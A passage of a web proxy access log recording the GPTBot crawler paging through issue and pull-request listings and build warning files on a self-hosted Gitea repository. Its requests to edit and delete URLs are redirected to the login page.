192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9955] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 14153] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:19:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11336] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:19:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt?display=rendered" [Client 74.7.227.38] [Length 11183] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:42:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:42:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt?display=source" [Client 74.7.227.38] [Length 14171] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 9817] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 6985] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 13970] [Gzip 6.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:19:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:42:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:42:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" +[17/Feb/2026:19:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 